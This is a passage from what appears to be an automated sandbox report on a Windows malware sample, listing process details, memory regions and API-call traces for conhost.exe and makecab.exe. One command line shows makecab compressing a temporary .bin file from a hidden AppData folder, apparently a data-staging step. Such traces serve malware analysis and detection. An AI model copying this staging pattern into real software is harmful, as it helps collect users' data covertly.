| out: lpMode=0x7ff60d9f85ec) returned 1 [0263.071] _get_osfhandle (_FileHandle=0) returned 0x20 [0263.071] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff60d9f85e8 | out: lpMode=0x7ff60d9f85e8) returned 1 [0263.071] SetConsoleInputExeNameW () returned 0x1 [0263.071] GetConsoleOutputCP () returned 0x1b5 [0263.071] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff60d9f8640 | out: lpCPInfo=0x7ff60d9f8640) returned 1 [0263.072] SetThreadUILanguage (LangId=0x0) returned 0x409 [0263.072] exit (_Code=0) Thread: id = 118 os_tid = 0xbd4 Process: id = "14" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x34fd9000" os_pid = "0xad8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0xbf0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1616 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1617 start_va = 0xf422790000 end_va = 0xf4227affff entry_point = 0x0 region_type = private name = "private_0x000000f422790000" filename = "" Region: id = 1618 start_va = 0xf4227b0000 end_va = 0xf4227c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f4227b0000" filename = "" Region: id = 1619 start_va = 0xf4227d0000 end_va = 0xf42280ffff entry_point = 0x0 region_type = private name = "private_0x000000f4227d0000" filename = "" Region: id = 1620 start_va = 0x7df5fff30000 end_va = 0x7ff5fff2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fff30000" filename = "" Region: id = 1621 start_va = 0x7ff684190000 end_va = 0x7ff6841b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff684190000" filename = "" Region: id = 1622 start_va = 0x7ff6841bd000 end_va = 0x7ff6841befff entry_point = 0x0 region_type = private name = "private_0x00007ff6841bd000" filename = "" Region: id = 1623 start_va = 0x7ff6841bf000 end_va = 0x7ff6841bffff entry_point = 0x0 region_type = private name = "private_0x00007ff6841bf000" filename = "" Region: id = 1624 start_va = 0x7ff6847f0000 end_va = 0x7ff684800fff entry_point = 0x7ff6847f0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1625 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1627 start_va = 0xf422960000 end_va = 0xf422a5ffff entry_point = 0x0 region_type = private name = "private_0x000000f422960000" filename = "" Region: id = 1628 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1629 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1630 start_va = 0xf422790000 end_va = 0xf42279ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f422790000" filename = "" Region: id = 1631 start_va = 0xf4227a0000 end_va = 0xf4227a6fff entry_point = 0x0 region_type = private name = "private_0x000000f4227a0000" filename = "" Region: id = 1632 start_va = 0xf422810000 end_va = 0xf4228cdfff entry_point = 0xf422810000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1633 start_va = 0xf4228d0000 end_va = 0xf42290ffff entry_point = 0x0 region_type = private name = "private_0x000000f4228d0000" filename = "" Region: id = 1634 start_va = 0xf422940000 end_va = 0xf42294ffff entry_point = 0x0 region_type = private name = "private_0x000000f422940000" filename = "" Region: id = 1635 start_va = 0x7ff684090000 end_va = 0x7ff68418ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff684090000" filename = "" Region: id = 1636 start_va = 0x7ff6841bb000 end_va = 0x7ff6841bcfff entry_point = 0x0 region_type = private name = "private_0x00007ff6841bb000" filename = "" Region: id = 1637 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1640 start_va = 0xf422910000 end_va = 0xf422910fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f422910000" filename = "" Region: id = 1641 start_va = 0xf422920000 end_va = 0xf422926fff entry_point = 0x0 region_type = private name = "private_0x000000f422920000" filename = "" Region: id = 1642 start_va = 0xf422930000 end_va = 0xf422930fff entry_point = 0x0 region_type = private name = "private_0x000000f422930000" filename = "" Region: id = 1643 start_va = 0xf422950000 end_va = 0xf422950fff entry_point = 0x0 region_type = private name = "private_0x000000f422950000" filename = "" Region: id = 1644 start_va = 0xf422a60000 end_va = 0xf422be7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f422a60000" filename = "" Region: id = 1645 start_va = 0xf422bf0000 end_va = 0xf422d70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f422bf0000" filename = "" Region: id = 1646 start_va = 0xf422d80000 end_va = 0xf42417ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f422d80000" filename = "" Region: id = 1647 start_va = 0x7ff971180000 end_va = 0x7ff971302fff entry_point = 0x7ff971180000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1648 start_va = 0x7ff9722f0000 end_va = 0x7ff972342fff entry_point = 0x7ff9722f0000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1649 start_va = 0x7ff9757b0000 end_va = 0x7ff9758fdfff entry_point = 0x7ff9757b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1650 start_va = 0x7ff977200000 end_va = 0x7ff97735bfff entry_point = 0x7ff977200000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1651 start_va = 0x7ff9774c0000 end_va = 0x7ff977644fff entry_point = 0x7ff9774c0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1652 start_va = 0x7ff9776c0000 end_va = 0x7ff97771afff entry_point = 0x7ff9776c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1653 start_va = 0x7ff977720000 end_va = 0x7ff977755fff entry_point = 0x7ff977720000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1654 start_va = 0x7ff977760000 end_va = 0x7ff97781dfff entry_point = 0x7ff977760000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1655 start_va = 0x7ff977830000 end_va = 0x7ff977aabfff entry_point = 0x7ff977830000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1656 start_va = 0x7ff977b60000 end_va = 0x7ff977ca0fff entry_point = 0x7ff977b60000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1657 start_va = 0x7ff977df0000 end_va = 0x7ff977f15fff entry_point = 0x7ff977df0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1674 start_va = 0xf424180000 end_va = 0xf4241bffff entry_point = 0x0 region_type = private name = "private_0x000000f424180000" filename = "" Region: id = 1675 start_va = 0xf424320000 end_va = 0xf42432ffff entry_point = 0x0 region_type = private name = "private_0x000000f424320000" filename = "" Region: id = 1676 start_va = 0x7ff6841b9000 end_va = 0x7ff6841bafff entry_point = 0x0 region_type = private name = "private_0x00007ff6841b9000" filename = "" Region: id = 1677 start_va = 0x7ff974980000 end_va = 0x7ff974992fff entry_point = 0x7ff974980000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1678 start_va = 0x7ff9749a0000 end_va = 0x7ff9749aefff entry_point = 0x7ff9749a0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1679 start_va = 0x7ff9749b0000 end_va = 0x7ff9749f9fff entry_point = 0x7ff9749b0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1680 start_va = 0x7ff974c30000 end_va = 0x7ff975257fff entry_point = 0x7ff974c30000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1681 start_va = 0x7ff975310000 end_va = 0x7ff9753c2fff entry_point = 0x7ff975310000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1682 start_va = 0x7ff975900000 end_va = 0x7ff976e24fff entry_point = 0x7ff975900000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1683 start_va = 0x7ff976f80000 end_va = 0x7ff977025fff entry_point = 0x7ff976f80000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1684 start_va = 0x7ff977360000 end_va = 0x7ff9773b0fff entry_point = 0x7ff977360000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1685 start_va = 0x7ff9733b0000 end_va = 0x7ff973445fff entry_point = 0x7ff9733b0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Thread: id = 109 os_tid = 0xa1c Thread: id = 111 os_tid = 0x854 Thread: id = 113 os_tid = 0x224 Thread: id = 209 os_tid = 0xb7c Process: id = "15" image_name = "makecab.exe" filename = "c:\\windows\\system32\\makecab.exe" page_root = "0x35181000" os_pid = "0x200" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x834" cmd_line = "makecab.exe /F \"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin\"" cur_dir = "C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1658 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1659 start_va = 0x27e8740000 end_va = 0x27e875ffff entry_point = 0x0 region_type = private name = "private_0x00000027e8740000" filename = "" Region: id = 1660 start_va = 0x27e8760000 end_va = 0x27e8773fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000027e8760000" filename = "" Region: id = 1661 start_va = 0x27e8780000 end_va = 0x27e87fffff entry_point = 0x0 region_type = private name = "private_0x00000027e8780000" filename = "" Region: id = 1662 start_va = 0x27e8800000 end_va = 0x27e8803fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000027e8800000" filename = "" Region: id = 1663 start_va = 0x27e8810000 end_va = 0x27e8811fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000027e8810000" filename = "" Region: id = 1664 start_va = 0x27e8820000 end_va = 0x27e8821fff entry_point = 0x0 region_type = private name = "private_0x00000027e8820000" filename = "" Region: id = 1665 start_va = 0x7df5ffac0000 end_va = 0x7ff5ffabffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffac0000" filename = "" Region: id = 1666 start_va = 0x7ff6a2c50000 end_va = 0x7ff6a2c72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6a2c50000" filename = "" Region: id = 1667 start_va = 0x7ff6a2c79000 end_va = 0x7ff6a2c79fff entry_point = 0x0 region_type = private name = "private_0x00007ff6a2c79000" filename = "" Region: id = 1668 start_va = 0x7ff6a2c7e000 end_va = 0x7ff6a2c7ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6a2c7e000" filename = "" Region: id = 1669 start_va = 0x7ff6a3bf0000 end_va = 0x7ff6a3c09fff entry_point = 0x7ff6a3bf0000 region_type = mapped_file name = "makecab.exe" filename = "\\Windows\\System32\\makecab.exe" (normalized: "c:\\windows\\system32\\makecab.exe") Region: id = 1670 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1671 start_va = 0x27e8860000 end_va = 0x27e895ffff entry_point = 0x0 region_type = private name = "private_0x00000027e8860000" filename = "" Region: id = 1672 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1673 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1801 start_va = 0x27e8740000 end_va = 0x27e874ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000027e8740000" filename = "" Region: id = 1802 start_va = 0x27e8750000 end_va = 0x27e8756fff entry_point = 0x0 region_type = private name = "private_0x00000027e8750000" filename = "" Region: id = 1803 start_va = 0x27e8830000 end_va = 0x27e8836fff entry_point = 0x0 region_type = private name = "private_0x00000027e8830000" filename = "" Region: id = 1804 start_va = 0x27e8840000 end_va = 0x27e8840fff entry_point = 0x0 region_type = private name = "private_0x00000027e8840000" filename = "" Region: id = 1805 start_va = 0x27e8850000 end_va = 0x27e8850fff entry_point = 0x0 region_type = private name = "private_0x00000027e8850000" filename = "" Region: id = 1806 start_va = 0x27e8960000 end_va = 0x27e8a1dfff entry_point = 0x27e8960000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1807 start_va = 0x27e8a20000 end_va = 0x27e8a9ffff entry_point = 0x0 region_type = private name = "private_0x00000027e8a20000" filename = "" Region: id = 1808 start_va = 0x27e8c10000 end_va = 0x27e8c1ffff entry_point = 0x0 region_type = private name = "private_0x00000027e8c10000" filename = "" Region: id = 1809 start_va = 0x27e8c20000 end_va = 0x27e8da7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000027e8c20000" filename = "" Region: id = 1810 start_va = 0x27e8db0000 end_va = 0x27e8f30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000027e8db0000" filename = "" Region: id = 1811 start_va = 0x27e8f40000 end_va = 0x27ea33ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000027e8f40000" filename = "" Region: id = 1812 start_va = 0x7ff6a2b50000 end_va = 0x7ff6a2c4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6a2b50000" filename = "" Region: id = 1813 start_va = 0x7ff6a2c7c000 end_va = 0x7ff6a2c7dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6a2c7c000" filename = "" Region: id = 1814 start_va = 0x7ff96c360000 end_va = 0x7ff96c369fff entry_point = 0x7ff96c360000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1815 start_va = 0x7ff96dd40000 end_va = 0x7ff96dd66fff entry_point = 0x7ff96dd40000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1816 start_va = 0x7ff9757b0000 end_va = 0x7ff9758fdfff entry_point = 0x7ff9757b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1817 start_va = 0x7ff977200000 end_va = 0x7ff97735bfff entry_point = 0x7ff977200000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1818 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1819 start_va = 0x7ff9774c0000 end_va = 0x7ff977644fff entry_point = 0x7ff9774c0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1820 start_va = 0x7ff977720000 end_va = 0x7ff977755fff entry_point = 0x7ff977720000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1829 start_va = 0x27e8aa0000 end_va = 0x27e8aa2fff entry_point = 0x27e8aa0000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1830 start_va = 0x27e8ab0000 end_va = 0x27e8ab8fff entry_point = 0x27e8ab0000 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1831 start_va = 0x27e8aa0000 end_va = 0x27e8aa2fff entry_point = 0x27e8aa0000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1832 start_va = 0x27e8ab0000 end_va = 0x27e8ab8fff entry_point = 0x27e8ab0000 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1848 start_va = 0x27e8aa0000 end_va = 0x27e8b9ffff entry_point = 0x0 region_type = private name = "private_0x00000027e8aa0000" filename = "" Thread: id = 112 os_tid = 0x20c [0254.336] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff6a3bf0000 [0254.336] __set_app_type (_Type=0x1) [0254.336] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff6a3bfe400) returned 0x0 [0254.336] __getmainargs (in: _Argc=0x7ff6a3c05118, _Argv=0x7ff6a3c05120, _Env=0x7ff6a3c05128, _DoWildCard=0, _StartInfo=0x7ff6a3c05134 | out: _Argc=0x7ff6a3c05118, _Argv=0x7ff6a3c05120, _Env=0x7ff6a3c05128) returned 0 [0254.336] GetVersion () returned 0x2800000a [0254.336] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x7ff977ab0000 [0254.337] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="HeapSetInformation") returned 0x7ff977ad0f40 [0254.337] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0254.337] __iob_func () returned 0x7ff97744e210 [0254.337] setvbuf (in: _File=0x7ff97744e240, _Buf=0x0, _Mode=4, _Size=0x0 | out: _File=0x7ff97744e240, _Buf=0x0) returned 0 [0254.337] __iob_func () returned 0x7ff97744e210 [0254.337] setvbuf (in: _File=0x7ff97744e270, _Buf=0x0, _Mode=4, _Size=0x0 | out: _File=0x7ff97744e270, _Buf=0x0) returned 0 [0254.337] printf (_Format="%s") returned 48 [0254.373] atoi (_Str="1") returned 1 [0254.373] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="Cabinet") returned 7 [0254.373] atoi (_Str="1") returned 1 [0254.373] _strcmpi (_Str1="On", _Str2="No") returned 1 [0254.373] _strcmpi (_Str1="On", _Str2="Off") returned 8 [0254.373] _strcmpi (_Str1="On", _Str2="False") returned 9 [0254.373] _strcmpi (_Str1="On", _Str2="Yes") returned -10 [0254.373] _strcmpi (_Str1="On", _Str2="On") returned 0 [0254.373] _strcmpi (_Str1="Cabinet", _Str2="CabinetFileCountThreshold") returned -102 [0254.374] atoi (_Str="1") returned 1 [0254.374] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="CabinetFileCountThreshold") returned 25 [0254.374] atoi (_Str="1") returned 1 [0254.374] _strcmpi (_Str1="Cabinet", _Str2="CabinetNameTemplate") returned -110 [0254.374] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="CabinetNameTemplate") returned -8 [0254.374] atoi (_Str="1") returned 1 [0254.374] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="CabinetNameTemplate") returned 19 [0254.374] atoi (_Str="1") returned 1 [0254.374] _strcmpi (_Str1="Cabinet", _Str2="ChecksumWidth") returned -7 [0254.374] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="ChecksumWidth") returned -7 [0254.374] _strcmpi (_Str1="CabinetNameTemplate", _Str2="ChecksumWidth") returned -7 [0254.374] atoi (_Str="1") returned 1 [0254.374] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="ChecksumWidth") returned 13 [0254.374] atoi (_Str="1") returned 1 [0254.374] atoi (_Str="8") returned 8 [0254.374] atoi (_Str="1") returned 1 [0254.374] atoi (_Str="8") returned 8 [0254.374] _strcmpi (_Str1="Cabinet", _Str2="ClusterSize") returned -11 [0254.374] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="ClusterSize") returned -11 [0254.374] _strcmpi (_Str1="CabinetNameTemplate", _Str2="ClusterSize") returned -11 [0254.374] _strcmpi (_Str1="ChecksumWidth", _Str2="ClusterSize") returned -4 [0254.374] atoi (_Str="1") returned 1 [0254.374] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="ClusterSize") returned 11 [0254.375] atoi (_Str="1") returned 1 [0254.375] _strcmpi (_Str1="1.44M", _Str2="360K") returned -2 [0254.375] atol (_Str="362496") returned 362496 [0254.375] atol (_Str="1.44M") returned 1 [0254.375] _strcmpi (_Str1="1.44M", _Str2="720K") returned -6 [0254.375] atol (_Str="730112") returned 730112 [0254.375] atol (_Str="1.44M") returned 1 [0254.375] _strcmpi (_Str1="1.44M", _Str2="1.2M") returned 2 [0254.375] atol (_Str="1213952") returned 1213952 [0254.375] atol (_Str="1.44M") returned 1 [0254.375] _strcmpi (_Str1="1.44M", _Str2="1.25M") returned 2 [0254.375] atol (_Str="1250304") returned 1250304 [0254.375] atol (_Str="1.44M") returned 1 [0254.375] _strcmpi (_Str1="1.44M", _Str2="1.44M") returned 0 [0254.375] _strcmpi (_Str1="Cabinet", _Str2="Compress") returned -14 [0254.375] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="Compress") returned -14 [0254.375] _strcmpi (_Str1="CabinetNameTemplate", _Str2="Compress") returned -14 [0254.375] _strcmpi (_Str1="ChecksumWidth", _Str2="Compress") returned -7 [0254.375] _strcmpi (_Str1="ClusterSize", _Str2="Compress") returned -3 [0254.375] atoi (_Str="1") returned 1 [0254.375] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="Compress") returned 8 [0254.375] atoi (_Str="1") returned 1 [0254.375] _strcmpi (_Str1="On", _Str2="No") returned 1 [0254.375] _strcmpi (_Str1="On", _Str2="Off") returned 8 [0254.375] _strcmpi (_Str1="On", _Str2="False") returned 9 [0254.375] _strcmpi (_Str1="On", _Str2="Yes") returned -10 [0254.375] _strcmpi (_Str1="On", _Str2="On") returned 0 [0254.375] _strcmpi (_Str1="Cabinet", _Str2="LongSourceFileNames") returned -9 [0254.375] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="LongSourceFileNames") returned -9 [0254.375] _strcmpi (_Str1="CabinetNameTemplate", _Str2="LongSourceFileNames") returned -9 [0254.375] _strcmpi (_Str1="ChecksumWidth", _Str2="LongSourceFileNames") returned -9 [0254.375] _strcmpi (_Str1="ClusterSize", _Str2="LongSourceFileNames") returned -9 [0254.375] _strcmpi (_Str1="Compress", _Str2="LongSourceFileNames") returned -9 [0254.375] atoi (_Str="1") returned 1 [0254.376] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="LongSourceFileNames") returned 19 [0254.376] atoi (_Str="1") returned 1 [0254.376] _strcmpi (_Str1="Off", _Str2="No") returned 1 [0254.376] _strcmpi (_Str1="Off", _Str2="Off") returned 0 [0254.376] _strcmpi (_Str1="Cabinet", _Str2="CompressedFileExtensionChar") returned -14 [0254.376] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="CompressedFileExtensionChar") returned -14 [0254.376] _strcmpi (_Str1="CabinetNameTemplate", _Str2="CompressedFileExtensionChar") returned -14 [0254.376] _strcmpi (_Str1="ChecksumWidth", _Str2="CompressedFileExtensionChar") returned -7 [0254.376] _strcmpi (_Str1="ClusterSize", _Str2="CompressedFileExtensionChar") returned -3 [0254.376] _strcmpi (_Str1="Compress", _Str2="CompressedFileExtensionChar") returned -101 [0254.376] _strcmpi (_Str1="LongSourceFileNames", _Str2="CompressedFileExtensionChar") returned 9 [0254.376] atoi (_Str="1") returned 1 [0254.376] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="CompressedFileExtensionChar") returned 27 [0254.376] atoi (_Str="1") returned 1 [0254.376] _strcmpi (_Str1="Cabinet", _Str2="CompressionType") returned -14 [0254.376] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="CompressionType") returned -14 [0254.376] _strcmpi (_Str1="CabinetNameTemplate", _Str2="CompressionType") returned -14 [0254.376] _strcmpi (_Str1="ChecksumWidth", _Str2="CompressionType") returned -7 [0254.376] _strcmpi (_Str1="ClusterSize", _Str2="CompressionType") returned -3 [0254.376] _strcmpi (_Str1="Compress", _Str2="CompressionType") returned -105 [0254.376] _strcmpi (_Str1="LongSourceFileNames", _Str2="CompressionType") returned 9 [0254.376] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="CompressionType") returned -4 [0254.376] atoi (_Str="1") returned 1 [0254.376] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="CompressionType") returned 15 [0254.377] atoi (_Str="1") returned 1 [0254.377] _strcmpi (_Str1="MSZIP", _Str2="MSZIP") returned 0 [0254.377] _strcmpi (_Str1="Cabinet", _Str2="CompressionLevel") returned -14 [0254.377] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="CompressionLevel") returned -14 [0254.377] _strcmpi 